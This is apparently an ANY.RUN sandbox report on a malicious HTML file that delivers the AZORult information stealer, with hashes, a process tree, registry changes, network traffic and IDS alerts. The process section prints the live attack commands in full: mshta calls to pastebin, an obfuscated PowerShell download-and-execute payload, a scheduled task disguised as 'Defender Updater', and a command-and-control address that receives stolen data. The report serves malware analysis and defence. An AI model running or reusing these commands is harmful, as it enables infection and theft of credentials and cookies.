analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

john.html

Full analysis: https://app.any.run/tasks/39ec71a2-31b9-4374-bb3f-1f64cdf3d013
Verdict: Malicious activity
Threats:

AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.

Analysis date: July 11, 2019, 13:43:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
rat
azorult
Indicators:
MIME: text/html
File info: HTML document, ASCII text, with very long lines
MD5:

DCB1AA86FABDBA8712A4D1ADCFDB0571

SHA1:

D672EF3C4CB85EA5E73EA53889D1C74BFEE68B5E

SHA256:

BF1794B8A7621AC5798D61658A8A3DB7B91362B68B9A88765A0523C19590D0F8

SSDEEP:

768:uG3eyHHvPWdoaTwOkxWXnFooCil/g2SpT:uG3LHH2dTTwOKWX9Cil/e

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Task Scheduler to run other applications

      • mshta.exe (PID: 2388)
    • Changes the autorun value in the registry

      • mshta.exe (PID: 2388)
    • Executes PowerShell scripts

      • mshta.exe (PID: 2388)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 1908)
    • AZORULT was detected

      • calc.exe (PID: 2112)
    • Connects to CnC server

      • calc.exe (PID: 2112)
    • Loads dropped or rewritten executable

      • calc.exe (PID: 2112)
    • Actions looks like stealing of personal data

      • calc.exe (PID: 2112)
  • SUSPICIOUS

    • Creates files in the user directory

      • mshta.exe (PID: 3112)
      • mshta.exe (PID: 2388)
      • powershell.exe (PID: 2904)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • mshta.exe (PID: 3112)
    • Application launched itself

      • mshta.exe (PID: 3112)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 2388)
      • calc.exe (PID: 2112)
    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 2708)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 2708)
    • Connects to server without host name

      • calc.exe (PID: 2112)
    • Reads the cookies of Mozilla Firefox

      • calc.exe (PID: 2112)
    • Reads the cookies of Google Chrome

      • calc.exe (PID: 2112)
    • Starts CMD.EXE for self-deleting

      • calc.exe (PID: 2112)
    • Executable content was dropped or overwritten

      • calc.exe (PID: 2112)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 3112)
      • mshta.exe (PID: 2388)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.html | HyperText Markup Language (100)

EXIF

HTML

Title: createdbymewithdeniss: john
Rating: adult
Generator: blogger
ContentType: text/html; charset=UTF-8
viewport: width=1100
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
50
Monitored processes
12
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start mshta.exe mshta.exe cmd.exe no specs powershell.exe schtasks.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs #AZORULT calc.exe cmd.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3112"C:\Windows\System32\mshta.exe" https://createdbymewithdeniss.blogspot.com/p/john.htmlC:\Windows\System32\mshta.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2388"C:\Windows\System32\mshta.exe" http://www.pastebin.com/raw/3VczmYsxC:\Windows\System32\mshta.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2708"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exitC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
128
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2904"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Mo=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,76,67,74,53,89,121,104,122,39,41,124,73,69,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,85,99,110,65,85,78,118,74,39,41,46,114,101,112,108,97,99,101,40,39,33,33,39,44,39,48,120,39,41,124,73,69,88,59,91,107,46,72,97,99,107,105,116,117,112,93,58,58,101,120,101,40,39,99,97,108,99,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($Mo)|IEXC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1908"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 30 /tn "Defender Updater" /tr "mshta.exe http://pastebin.com/raw/rd9puWAp" /F C:\Windows\System32\schtasks.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3828taskkill /f /im winword.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4040taskkill /f /im excel.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3860taskkill /f /im MSPUB.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3472taskkill /f /im POWERPNT.EXE C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2112"{path}"C:\WINDOWS\system32\calc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Calculator
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
703
Read events
515
Write events
188
Delete events
0

Modification events

(PID) Process:(3112) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3112) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3112) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(3112) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
4600000077000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
(PID) Process:(3112) mshta.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2388) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2388) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2388) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(2388) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
4600000078000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
(PID) Process:(2388) mshta.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
Executable files
48
Suspicious files
3
Text files
15
Unknown types
0

Dropped files

PID
Process
Filename
Type
3112mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\cb=gapi[1].loaded_1
MD5:
SHA256:
2904powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B0BLXGUI4WKY4332L6I5.temp
MD5:
SHA256:
3112mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\3399642339-ieretrofit[1].jshtml
MD5:BE2B0433B22D6FC049F1B2D75DAAF7FA
SHA256:7186786ED5A17B3DB11B7BE7B4EFF0E2A95FDE616D81E68FEE6530F7523FB6E9
3112mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\john[1].htmlhtml
MD5:1C9C53447EDB5748DE788FA8ED52A214
SHA256:FEAE3B2F36AC755D9F22A393F3B98D47B33E0F80AAC20301D99B0D4F91B967B5
3112mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\1646370754-comment_from_post_iframe[1].jshtml
MD5:9EE08AD2448D931C3350F8EFB31B9583
SHA256:045A89DA56E925603D6AE87BD25C68A06487B706CB75CD41138614995118D32E
3112mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\cb=gapi[1].loaded_2text
MD5:DFCA983F4B2AFD0472667416B99E0F9A
SHA256:B88D9432A00CFA0D6CFDC1F55AD27E75B029B638075C68E1DE32EB5A5DC0B943
2388mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\3VczmYsx[1].txthtml
MD5:ED4BD6B5E56526C4C2221380DB37C224
SHA256:E4E12E42E568F8A461D040C8B4E1B9E3BD06B9ACF7E3AFC6A49892F18B3FECBF
3112mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\error[1]text
MD5:35FE91C2AC1BA0913CC617622B9EB43F
SHA256:966240C0527B20E8E2553B7E5A68594AE69230AA00186F2C6C2C342405494837
3112mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@google[1].txttext
MD5:F82F6EC87A3028212B9AD7951BB23C1D
SHA256:CF2FF2B5C435D2EE08C7A08D3A033997B932DF284452A2EB68D767D32743D712
3112mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\1501421786-widgets[1].jstext
MD5:65CAB1DA9A68D9FC06C0CEEA26E1879F
SHA256:75033E75836DE28AF64FA0ABCDEEC178DF9DB9446A09BEA2A8E9E72958466B4B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
14
DNS requests
9
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2388
mshta.exe
GET
301
104.20.208.21:80
http://www.pastebin.com/raw/3VczmYsx
US
html
2.02 Kb
shared
2112
calc.exe
POST
200
149.56.223.205:80
http://149.56.223.205/john/index.php
CA
txt
4.27 Mb
malicious
2112
calc.exe
POST
200
149.56.223.205:80
http://149.56.223.205/john/index.php
CA
text
5 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3112
mshta.exe
216.58.205.226:443
pagead2.googlesyndication.com
Google Inc.
US
whitelisted
3112
mshta.exe
172.217.22.9:443
www.blogger.com
Google Inc.
US
whitelisted
172.217.18.173:443
accounts.google.com
Google Inc.
US
whitelisted
3112
mshta.exe
172.217.16.137:443
resources.blogblog.com
Google Inc.
US
unknown
3112
mshta.exe
172.217.16.174:443
apis.google.com
Google Inc.
US
whitelisted
3112
mshta.exe
172.217.22.33:443
createdbymewithdeniss.blogspot.com
Google Inc.
US
whitelisted
2388
mshta.exe
104.20.208.21:80
www.pastebin.com
Cloudflare Inc
US
shared
2388
mshta.exe
104.20.209.21:80
www.pastebin.com
Cloudflare Inc
US
shared
2388
mshta.exe
104.20.209.21:443
www.pastebin.com
Cloudflare Inc
US
shared
2112
calc.exe
149.56.223.205:80
OVH SAS
CA
malicious

DNS requests

Domain
IP
Reputation
createdbymewithdeniss.blogspot.com
  • 172.217.22.33
whitelisted
www.blogger.com
  • 172.217.22.9
shared
apis.google.com
  • 172.217.16.174
whitelisted
pagead2.googlesyndication.com
  • 216.58.205.226
whitelisted
resources.blogblog.com
  • 172.217.16.137
whitelisted
accounts.google.com
  • 172.217.18.173
shared
www.pastebin.com
  • 104.20.209.21
  • 104.20.208.21
shared
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
shared

Threats

PID
Process
Class
Message
2388
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2112
calc.exe
A Network Trojan was detected
ET TROJAN AZORult Variant.4 Checkin M2
2112
calc.exe
A Network Trojan was detected
AV TROJAN Azorult CnC Beacon
2112
calc.exe
A Network Trojan was detected
AV TROJAN AZORult CnC Beacon
2112
calc.exe
A Network Trojan was detected
MALWARE [PTsecurity] AZORult client request
2112
calc.exe
A Network Trojan was detected
MALWARE [PTsecurity] AZORult.Stealer HTTP Header
2112
calc.exe
Potentially Bad Traffic
ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1
2112
calc.exe
A Network Trojan was detected
MALWARE [PTsecurity] AZORult.Stealer HTTP Header
2112
calc.exe
A Network Trojan was detected
AV TROJAN Azorult CnC Beacon
2112
calc.exe
A Network Trojan was detected
MALWARE [PTsecurity] AZORult client request
1 ETPRO signatures available at the full report
No debug info